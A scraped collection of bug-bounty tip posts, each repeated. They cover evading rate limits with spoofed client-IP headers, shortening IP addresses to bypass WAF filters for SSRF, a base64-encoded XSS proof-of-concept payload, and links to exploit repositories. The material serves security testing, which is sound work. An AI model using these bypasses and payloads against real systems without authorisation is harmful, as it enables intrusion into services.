Rate limit bypass:
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
If bypass successful, & after a while blocking request again. Increment the last octate
#infosec #bugbounty
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
If bypass successful, & after a while blocking request again. Increment the last octate
#infosec #bugbounty
Bugbounty tips#3
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Payload xss en aplicación de javascript.
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>
#xss #payload #payloads #bugbountytips
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>
#xss #payload #payloads #bugbountytips
Find #CVEs
https://github.com/Medicean/VulApps
https://github.com/qazbnm456/awesome-cve-poc
https://github.com/tunz/js-vuln-db
https://github.com/cve-search/cve-search
https://github.com/nixawk/labs
https://github.com/Coalfire-Research/java-deserialization-exploits
https://github.com/Metnew/uxss-db
https://github.com/TH3xACE/SUDO_KILLER
https://github.com/Mr-xn/Penetration_Testing_POC
https://github.com/toolswatch/vFeed
#bugbounty,#bugbountytips
https://github.com/Medicean/VulApps
https://github.com/qazbnm456/awesome-cve-poc
https://github.com/tunz/js-vuln-db
https://github.com/cve-search/cve-search
https://github.com/nixawk/labs
https://github.com/Coalfire-Research/java-deserialization-exploits
https://github.com/Metnew/uxss-db
https://github.com/TH3xACE/SUDO_KILLER
https://github.com/Mr-xn/Penetration_Testing_POC
https://github.com/toolswatch/vFeed
#bugbounty,#bugbountytips
GitHub
GitHub - Medicean/VulApps: 快速搭建各种漏洞环境(Various vulnerability environment)
快速搭建各种漏洞环境(Various vulnerability environment). Contribute to Medicean/VulApps development by creating an account on GitHub.